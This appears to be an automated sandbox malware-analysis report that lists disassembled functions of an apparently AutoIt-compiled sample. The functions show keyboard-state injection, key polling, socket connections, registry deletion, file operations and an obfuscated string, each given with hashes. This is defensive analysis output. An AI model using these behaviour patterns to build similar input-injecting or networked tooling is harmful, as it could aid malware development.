                                                  • SetKeyboardState.USER32(?), ref: 00C21002
                                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 00C21030
                                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 00C2104F
                                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 00C21095
                                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00C210B8
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessagePost$KeyboardState$Parent
                                                  • String ID:
                                                  • API String ID: 87235514-0
                                                  • Opcode ID: 4e06f19d0dc66b4adbde6895fc7233b8212673a11570c6486181865d242b2650
                                                  • Instruction ID: b8a4f50a604e84860fc58624bc5fdff87364fa64011d03284976817afe9ba4bd
                                                  • Opcode Fuzzy Hash: 4e06f19d0dc66b4adbde6895fc7233b8212673a11570c6486181865d242b2650
                                                  • Instruction Fuzzy Hash: 205125605447E53DFB3642749C05BBABEA96B16300F0C858AF5E485CD3C2E8EED5D760
                                                  Function 00C20D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetParent.USER32(00000000), ref: 00C20DA5
                                                  • GetKeyboardState.USER32(?), ref: 00C20DBA
                                                  • SetKeyboardState.USER32(?), ref: 00C20E1B
                                                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00C20E47
                                                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00C20E64
                                                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00C20EA8
                                                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00C20EC9
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessagePost$KeyboardState$Parent
                                                  • String ID:
                                                  • API String ID: 87235514-0
                                                  • Opcode ID: ecf4d906e81d3f992e70984911a3cb7a547239e20304b44dbe51b9abf6a81e76
                                                  • Instruction ID: ece044f1841a6c0eca0c4b6af1a1534edbabc80704801e2e6565f0282d98a944
                                                  • Opcode Fuzzy Hash: ecf4d906e81d3f992e70984911a3cb7a547239e20304b44dbe51b9abf6a81e76
                                                  • Instruction Fuzzy Hash: CE51D5A15447E57DFB3283649C45B7ABFA96B06300F18888EF1E486CC3D395AED4E760
                                                  Function 00C255FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _wcsncpy$LocalTime
                                                  • String ID:
                                                  • API String ID: 2945705084-0
                                                  • Opcode ID: 7a8dfb07e8731b70505187589d2dbc2d97303385d4ac0671d413a30124cf82ac
                                                  • Instruction ID: 9e7fc855e801664d8cb45e1a64ae5124aab3b4244246009ea27078d7dc408100
                                                  • Opcode Fuzzy Hash: 7a8dfb07e8731b70505187589d2dbc2d97303385d4ac0671d413a30124cf82ac
                                                  • Instruction Fuzzy Hash: F941A275C1065476CB11EBB59C8AACFB3FCAF04710F5089A6F518E3221EB34A745C7AA
                                                  Function 00BC2344 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111keyboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCursorPos.USER32(?), ref: 00BC2357
                                                  • ScreenToClient.USER32(00C857B0,?), ref: 00BC2374
                                                  • GetAsyncKeyState.USER32(00000001), ref: 00BC2399
                                                  • GetAsyncKeyState.USER32(00000002), ref: 00BC23A7
                                                  Strings
                                                  • jdyakj0yakjcyakjcyakj2yakj8yakj9yakj4yakjdyakjfyakjcyakj5yakj7yakj5yakj6yakj8yakj9yakj6yakj5yakjfyakj4yakj8yakj3yakjeyakj4yakjfyak, xrefs: 00BFBFF9
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: AsyncState$ClientCursorScreen
                                                  • String ID: jdyakj0yakjcyakjcyakj2yakj8yakj9yakj4yakjdyakjfyakjcyakj5yakj7yakj5yakj6yakj8yakj9yakj6yakj5yakjfyakj4yakj8yakj3yakjeyakj4yakjfyak
                                                  • API String ID: 4210589936-549041074
                                                  • Opcode ID: 06a1fee896b474287e1a3edde2e97250e2c921d79d399a5bc49b9b32187efb58
                                                  • Instruction ID: 5d4db56be18ac9e6f4a46848fcdeced387815fa2c833184f85eb3bcbb6051ab6
                                                  • Opcode Fuzzy Hash: 06a1fee896b474287e1a3edde2e97250e2c921d79d399a5bc49b9b32187efb58
                                                  • Instruction Fuzzy Hash: FC417D35A04109FFCB159F68C884FEDBBB4FB45360F20439AF929922A0CB359994DB95
                                                  Function 00C23671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C2466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C23697,?), ref: 00C2468B
                                                    • Part of subcall function 00C2466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C23697,?), ref: 00C246A4
                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00C236B7
                                                  • _wcscmp.LIBCMT ref: 00C236D3
                                                  • MoveFileW.KERNEL32(?,?), ref: 00C236EB
                                                  • _wcscat.LIBCMT ref: 00C23733
                                                  • SHFileOperationW.SHELL32(?), ref: 00C2379F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                  • String ID: \*.*
                                                  • API String ID: 1377345388-1173974218
                                                  • Opcode ID: 0f543dd78adaa2e7e483ecae9723a6a2105c0360dbe71750e1f5aa065b6a55ac
                                                  • Instruction ID: 5bb7a7ff87477aa37e7cf3324ee7acd1e0288efbd7809a8bc0477c8bb2a33f03
                                                  • Opcode Fuzzy Hash: 0f543dd78adaa2e7e483ecae9723a6a2105c0360dbe71750e1f5aa065b6a55ac
                                                  • Instruction Fuzzy Hash: 85418F71108394AEC756EF64D841ADF77ECAF89380F10086EB49AC3651EB38D789C752
                                                  Function 00C47291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C472AA
                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C47351
                                                  • IsMenu.USER32(?), ref: 00C47369
                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C473B1
                                                  • DrawMenuBar.USER32 ref: 00C473C4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Menu$Item$DrawInfoInsert_memset
                                                  • String ID: 0
                                                  • API String ID: 3866635326-4108050209
                                                  • Opcode ID: b6f949fa7099d8b19168e45c8257f54e632d06e679c5eb915a4d64f8547eb9c1
                                                  • Instruction ID: 1d4d12a463c9f849b74c80295db6e037c7acfd3c77b33d5e46fe7b6810754ca4
                                                  • Opcode Fuzzy Hash: b6f949fa7099d8b19168e45c8257f54e632d06e679c5eb915a4d64f8547eb9c1
                                                  • Instruction Fuzzy Hash: F3411575A44208EFDB20DF60D884A9EBBF8FB09310F148629FD15A7260D770AE50DF60
                                                  Function 00C40FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00C40FD4
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C40FFE
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00C410B5
                                                    • Part of subcall function 00C40FA5: RegCloseKey.ADVAPI32(?), ref: 00C4101B
                                                    • Part of subcall function 00C40FA5: FreeLibrary.KERNEL32(?), ref: 00C4106D
                                                    • Part of subcall function 00C40FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00C41090
                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00C41058
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                  • String ID:
                                                  • API String ID: 395352322-0
                                                  • Opcode ID: 691bce689529e4b8a2c80668488d80d475a5988b9faed23614555b4b47d99335
                                                  • Instruction ID: abc19d19436ded8b07f44595e4a11c2338fb1c87adbf91196f9afc16f49c96ee
                                                  • Opcode Fuzzy Hash: 691bce689529e4b8a2c80668488d80d475a5988b9faed23614555b4b47d99335
                                                  • Instruction Fuzzy Hash: C7313E75900109BFEB149F90DC89EFFB7BCFF09340F04016AE952A2141D7705F899AA0
                                                  Function 00C462CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00C462EC
                                                  • GetWindowLongW.USER32(00EE54C8,000000F0), ref: 00C4631F
                                                  • GetWindowLongW.USER32(00EE54C8,000000F0), ref: 00C46354
                                                  • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00C46386
                                                  • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00C463B0
                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00C463C1
                                                  • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00C463DB
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: LongWindow$MessageSend
                                                  • String ID:
                                                  • API String ID: 2178440468-0
                                                  • Opcode ID: 7a7a4842fa48c687fd024ec1a0d497c3eac2d6464d29ef9a7e7cbeff33694a9b
                                                  • Instruction ID: 5f8782dcd2819c60813674b2166da3c0e92ff3a878cc5703f377087c9d8fa50b
                                                  • Opcode Fuzzy Hash: 7a7a4842fa48c687fd024ec1a0d497c3eac2d6464d29ef9a7e7cbeff33694a9b
                                                  • Instruction Fuzzy Hash: 03311338640290AFDB21CF19DC84F5837E1FB4A724F1901A9F5218F2B6CB71AD40DB52
                                                  Function 00C1DAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C1DB2E
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C1DB54
                                                  • SysAllocString.OLEAUT32(00000000), ref: 00C1DB57
                                                  • SysAllocString.OLEAUT32(?), ref: 00C1DB75
                                                  • SysFreeString.OLEAUT32(?), ref: 00C1DB7E
                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00C1DBA3
                                                  • SysAllocString.OLEAUT32(?), ref: 00C1DBB1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                  • String ID:
                                                  • API String ID: 3761583154-0
                                                  • Opcode ID: cd751c72e8c671ecc780c85cb1afae6edbdc01905aac0cb6151ed3916759f292
                                                  • Instruction ID: 21c495fb4c6bf317a1fa016aca12d6d785c019e65e2b07d103a23e361c46fbd2
                                                  • Opcode Fuzzy Hash: cd751c72e8c671ecc780c85cb1afae6edbdc01905aac0cb6151ed3916759f292
                                                  • Instruction Fuzzy Hash: 4221A376604219AF9F10DFA9DC88DFF73ECFB0A360B018169F916DB250DA709D819B60
                                                  Function 00C36173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C37D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00C37DB6
                                                  • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00C361C6
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00C361D5
                                                  • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00C3620E
                                                  • connect.WSOCK32(00000000,?,00000010), ref: 00C36217
                                                  • WSAGetLastError.WSOCK32 ref: 00C36221
                                                  • closesocket.WSOCK32(00000000), ref: 00C3624A
                                                  • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00C36263
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                  • String ID:
                                                  • API String ID: 910771015-0
                                                  • Opcode ID: 6d94b7bd47b0025dd3cba07d6615b909b7da7dc993cbf3010c6599da949dc2a8
                                                  • Instruction ID: da790a27d0ca8232e138b0f0be2ef1872b6794a9a45a17687a74556ad5372fcc
                                                  • Opcode Fuzzy Hash: 6d94b7bd47b0025dd3cba07d6615b909b7da7dc993cbf3010c6599da949dc2a8
                                                  • Instruction Fuzzy Hash: D531C175610108AFEF10AF24CC89FBE7BA8EB46750F05806DF915AB291CB70AD059BA1
                                                  Function 00C1F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: __wcsnicmp
                                                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                  • API String ID: 1038674560-2734436370
                                                  • Opcode ID: 2a7b7d9246ce1cb7bacab3ce1e7022b0ef3a2d4685c61de813d0bf022852b772
                                                  • Instruction ID: 6863c9dc5039ec0f2cb253a189184d9d2f82f71aa5d36010d8cd03145345a64a
                                                  • Opcode Fuzzy Hash: 2a7b7d9246ce1cb7bacab3ce1e7022b0ef3a2d4685c61de813d0bf022852b772
                                                  • Instruction Fuzzy Hash: 582134B220465166D220AA35AC02EEB73E8EF5B740F24403DF85687191EB909ED3E2D5
                                                  Function 00C1DBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C1DC09
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C1DC2F
                                                  • SysAllocString.OLEAUT32(00000000), ref: 00C1DC32
                                                  • SysAllocString.OLEAUT32 ref: 00C1DC53
                                                  • SysFreeString.OLEAUT32 ref: 00C1DC5C
                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00C1DC76
                                                  • SysAllocString.OLEAUT32(?), ref: 00C1DC84
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                  • String ID:
                                                  • API String ID: 3761583154-0
                                                  • Opcode ID: 755ffcab590c515133850c5e918d6cce1493fdaf94c49adc3b68f0f35184d6d6
                                                  • Instruction ID: a09003d00d395340cbf7fb33741106626ba1d1fc946d270bd2b20fbc3fb97739
                                                  • Opcode Fuzzy Hash: 755ffcab590c515133850c5e918d6cce1493fdaf94c49adc3b68f0f35184d6d6
                                                  • Instruction Fuzzy Hash: 37217735604105AF9B10DFA9DC88EEB77ECFB0A360B108525F915CB260DAB0DD81DBA4
                                                  Function 00C475CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BC1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00BC1D73
                                                    • Part of subcall function 00BC1D35: GetStockObject.GDI32(00000011), ref: 00BC1D87
                                                    • Part of subcall function 00BC1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BC1D91
                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00C47632
                                                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00C4763F
                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00C4764A
                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00C47659
                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00C47665
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CreateObjectStockWindow
                                                  • String ID: Msctls_Progress32
                                                  • API String ID: 1025951953-3636473452
                                                  • Opcode ID: 16c276e7ef439a8fd2fa7b6c4653f9830aa1d953f962faccec4c94930efe9e55
                                                  • Instruction ID: b26e364f9705f5243d6384d0da3a7e8f32ff12a2cc6495a955c32dc053f21f77
                                                  • Opcode Fuzzy Hash: 16c276e7ef439a8fd2fa7b6c4653f9830aa1d953f962faccec4c94930efe9e55
                                                  • Instruction Fuzzy Hash: 1E11B6B1510119BFEF118F64CC85EEB7F6DFF08798F014114B604A2060CB729C21DBA4
                                                  Function 00BE9AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __init_pointers.LIBCMT ref: 00BE9AE6
                                                    • Part of subcall function 00BE3187: EncodePointer.KERNEL32(00000000), ref: 00BE318A
                                                    • Part of subcall function 00BE3187: __initp_misc_winsig.LIBCMT ref: 00BE31A5
                                                    • Part of subcall function 00BE3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00BE9EA0
                                                    • Part of subcall function 00BE3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00BE9EB4
                                                    • Part of subcall function 00BE3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00BE9EC7
                                                    • Part of subcall function 00BE3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00BE9EDA
                                                    • Part of subcall function 00BE3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00BE9EED
                                                    • Part of subcall function 00BE3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00BE9F00
                                                    • Part of subcall function 00BE3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00BE9F13
                                                    • Part of subcall function 00BE3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00BE9F26
                                                    • Part of subcall function 00BE3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00BE9F39
                                                    • Part of subcall function 00BE3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00BE9F4C
                                                    • Part of subcall function 00BE3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00BE9F5F
                                                    • Part of subcall function 00BE3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00BE9F72
                                                    • Part of subcall function 00BE3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00BE9F85
                                                    • Part of subcall function 00BE3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00BE9F98
                                                    • Part of subcall function 00BE3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00BE9FAB
                                                    • Part of subcall function 00BE3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00BE9FBE
                                                  • __mtinitlocks.LIBCMT ref: 00BE9AEB
                                                  • __mtterm.LIBCMT ref: 00BE9AF4
                                                    • Part of subcall function 00BE9B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00BE9AF9,00BE7CD0,00C7A0B8,00000014), ref: 00BE9C56
                                                    • Part of subcall function 00BE9B5C: _free.LIBCMT ref: 00BE9C5D
                                                    • Part of subcall function 00BE9B5C: DeleteCriticalSection.KERNEL32(00C7EC00,?,?,00BE9AF9,00BE7CD0,00C7A0B8,00000014), ref: 00BE9C7F
